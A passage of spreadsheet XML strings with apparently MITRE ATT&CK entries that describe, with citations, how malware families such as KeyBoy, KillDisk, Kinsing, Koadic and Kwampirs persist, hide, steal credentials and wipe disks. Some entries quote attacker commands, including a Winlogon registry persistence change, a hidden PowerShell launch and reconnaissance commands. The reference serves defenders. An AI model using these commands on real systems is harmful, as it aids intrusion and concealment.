    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the system architecture, OS version, and MAC address information.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the DNS address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>Variants of [Kevin](https://attack.mitre.org/software/S1020) can communicate over DNS through queries to the server for constructed domain names with embedded information.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can create directories to store logs and other collected data.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can exfiltrate data to the C2 server in 27-character chunks.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can upload logs and other data from a compromised host.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can send data from the victim host through a DNS C2 channel.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can assign hard-coded fallback domains for C2.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can delete files created on the victim's machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can hide the current window from the targeted user via the `ShowWindow` API function.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can download files to the compromised host.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can generate a sequence of dummy HTTP C2 requests to obscure traffic.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can use the `ShowWindow` API to avoid detection.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) has Base64-encoded its configuration file.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can use a custom protocol tunneled through DNS or HTTP.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can Base32 encode chunks of output files during exfiltration.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can enumerate the OS version and hostname of a targeted machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can collect the MAC address and other information from a victim machine using `ipconfig/all`.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can sleep for a time interval between C2 communication attempts.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>Variants of [Kevin](https://attack.mitre.org/software/S1020) can communicate with C2 over HTTP.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can use a renamed image of `cmd.exe` for execution.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) attempts to collect passwords from browsers.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to launch a file browser or explorer on the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses &lt;code&gt;-w Hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload. (Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a download and upload functionality.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a keylogger for intercepting credentials and keystrokes.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>In one version of [KeyBoy](https://attack.mitre.org/software/S0387), string obfuscation routines were used to hide many of the critical values referenced in the malware.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses PowerShell commands to download and execute payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses custom SSL libraries to impersonate SSL in C2 traffic.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses Python scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to perform screen grabbing.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can gather extended system information, such as information about the operating system, disks, and memory.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can determine the public or WAN IP address for the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) time-stomped its DLL in order to evade detection.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses VBS scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can launch interactive shells for communicating with the victim machine.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a service pointing to a malicious DLL dropped to disk.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) issues the command &lt;code&gt;reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”&lt;/code&gt; to achieve persistence.(Citation: PWC KeyBoys Feb 2017) (Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) prompts the users for credentials.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a Launch Agent to persist.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a copy of tor2web proxy for HTTPS communications.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses Python for scripting to execute additional commands.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.(Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses the keychaindump project to read securityd memory.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) adds the setuid flag to a binary so it can easily elevate in the future.(Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses HTTPS for command and control.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has attempted to get the access token of a process by calling &lt;code&gt;OpenProcessToken&lt;/code&gt;. If [KillDisk](https://attack.mitre.org/software/S0607) gets the access token, then it attempt to modify the token privileges with &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt;.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) deletes Application, Security, Setup, and System Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) deletes system files to make the OS unbootable. [KillDisk](https://attack.mitre.org/software/S0607) also targets and deletes files with 35 different file extensions.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has a ransomware component that encrypts files with an AES key that is also RSA-1028 encrypted.(Citation: KillDisk Ransomware)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) overwrites the first sector of the Master Boot Record with “0x00”.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has the ability to quit and delete itself.(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has used the &lt;code&gt;FindNextFile&lt;/code&gt; command as part of its file deletion process.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) registers as a service under the Plug-And-Play Support name.(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has called the Windows API to retrieve the hard disk handle and shut down the machine.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) uses VMProtect to make reverse engineering the malware more difficult.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has called &lt;code&gt;GetCurrentProcess&lt;/code&gt;.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) terminates various processes to get the user to reboot the victim machine.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) loads and executes functions from a DLL.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) retrieves the hard disk name by calling the &lt;code&gt;CreateFileA to \\.\PHYSICALDRIVE0&lt;/code&gt; API.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) attempts to reboot the machine by terminating specific processes.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched &lt;code&gt;bash_history&lt;/code&gt; for credentials.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has attempted to brute force hosts over SSH.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed with an Ubuntu container entry point that runs shell scripts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used crontab to download and run shell scripts every minute to ensure persistence.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was run through a deployed Ubuntu container.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed in an Ubuntu container deployed via an open Docker daemon API.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used the find command to search for specific files.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has downloaded additional lateral movement scripts from C2.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used chmod to modify permissions on key files for use.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched for private keys.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used ps to list processes.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used a script to parse files like &lt;code&gt;/etc/hosts&lt;/code&gt; and SSH &lt;code&gt;known_hosts&lt;/code&gt; to discover remote systems.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has created and run a Bitcoin cryptocurrency miner.(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used SSH for lateral movement.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used Unix shell scripts to execute commands in the victim environment.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used valid SSH credentials to access remote hosts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has communicated with C2 over HTTP.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to uninstall malware from the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to list drives on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to conceal its activity through hiding active windows.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to download and execute files.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to initiate keylogging on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to remotely trigger keyboard input and mouse clicks. (Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to capture screenshots on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use SSL and TLS for communications.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve the current content of the user clipboard.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download files off the target system to send back to the server.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can perform process injection by using a reflective DLL.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can obtain a list of directories.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has used the command &lt;code&gt;Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden&lt;/code&gt; to hide its window.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download additional files and tools.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Koadic](https://attack.mitre.org/software/S0250) can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by gathering domain controller hashes from NTDS.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan for open TCP ports on the target network.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan local network for open SMB.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t xml:space="preserve">[Koadic](https://attack.mitre.org/software/S0250) has used PowerShell to establish persistence.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Regsvr32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can enable remote desktop on the victim's machine.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Rundll32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t xml:space="preserve">[Koadic](https://attack.mitre.org/software/S0250) has used scheduled tasks to add persistence.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by dumping SAM/SECURITY hive.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can run a command on another machine using [PsExec](https://attack.mitre.org/software/S0029).(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can obtain the OS version and build, computer name, and processor architecture from a compromised host.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve the contents of the IP routing table as well as information about the Windows domain.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can identify logged in users across the domain and views user sessions.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has used HTTP for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can open an interactive command-shell to perform command line functions on victim machines. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (Jscript) and to run arbitrary shellcode.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use WMI to execute commands.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641)'s authentication and key exchange is performed using RSA-512.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can remove all command history on compromised hosts.(Citation: ESET Kobalos Feb 2021)	</t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can write captured SSH connection credentials to a file under the &lt;code&gt;/var/run&lt;/code&gt; directory with a &lt;code&gt;.pid&lt;/code&gt; extension for exfiltration.(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) decrypts strings right after the initial communication, but before the authentication process.(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can exfiltrate credentials over the network via UDP.(Citation: ESET Kobalos Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) can chain together multiple compromised machines as proxies to reach their final targets.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) encrypts all strings using RC4 and bundles all functionality into a single function call.(Citation: ESET Kobalos Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641)'s post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) can record the hostname and kernel version of the target machine.(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) can record the IP address of the target machine.(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can modify timestamps of replaced files, such as &lt;code&gt;ssh&lt;/code&gt; with the added credential stealer or &lt;code&gt;sshd&lt;/code&gt; used to deploy [Kobalos](https://attack.mitre.org/software/S0641).(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) is triggered by an incoming TCP connection to a legitimate service from a specific source port.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.(Citation: ESET Kobalos Feb 2021) </t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) trojan supports file deletion.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) payload is stored in a hidden directory at &lt;code&gt;/Users/Shared/.local/kextd&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t xml:space="preserve"> The [Komplex](https://attack.mitre.org/software/S0162) trojan creates a persistent launch agent called with &lt;code&gt;$HOME/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt; with &lt;code&gt;launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects a running process list.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses an 11-byte XOR algorithm to hide data.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects the current running username.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses HTTP POST requests.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>Before writing to disk, [Kwampirs](https://attack.mitre.org/software/S0236) inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) decrypts and extracts a copy of its main DLL payload when executing.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of domain groups with the command &lt;code&gt;net localgroup /domain&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses a large list of C2 servers that it cycles through until a successful connection is established.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of files and directories in C:\ with the command &lt;code&gt;dir /s /a c:\ &gt;&gt; "C:\windows\TEMP\[RANDOM].tmp"&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files from C2 servers.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of accounts with the command &lt;code&gt;net users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of users belonging to the local users and administrators groups with the commands &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net localgroup users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) establishes persistence by adding a new service with the display name "WMI Performance Adapter Extension" in an attempt to masquerade as a legitimate WMI service.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of network shares with the command &lt;code&gt;net share&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files that are base64-encoded and encrypted with another cipher.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects password policy information with the command &lt;code&gt;net accounts&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of available servers with the command &lt;code&gt;net view&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses rundll32.exe in a Registry value added to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) copies itself over network shares to move laterally on a victim network.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands &lt;code&gt;systeminfo&lt;/code&gt;, &lt;code&gt;net config workstation&lt;/code&gt;, &lt;code&gt;hostname&lt;/code&gt;, &lt;code&gt;ver&lt;/code&gt;, &lt;code&gt;set&lt;/code&gt;, and &lt;code&gt;date /t&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects network adapter and interface information by using the commands &lt;code&gt;ipconfig /all&lt;/code&gt;, &lt;code&gt;arp -a&lt;/code&gt; and &lt;code&gt;route print&lt;/code&gt;. It also collects the system's MAC address with &lt;code&gt;getmac&lt;/code&gt; and domain configuration with &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of active and listening connections by using the command &lt;code&gt;netstat -nao&lt;/code&gt; as well as a list of available network mappings with &lt;code&gt;net use&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects registered owner details by using the commands &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /svc&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) creates a new service named WmiApSrvEx to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox cloud storage service for command and control.(Citation: FireEye admin@338)</t>
  </si>
  <si>
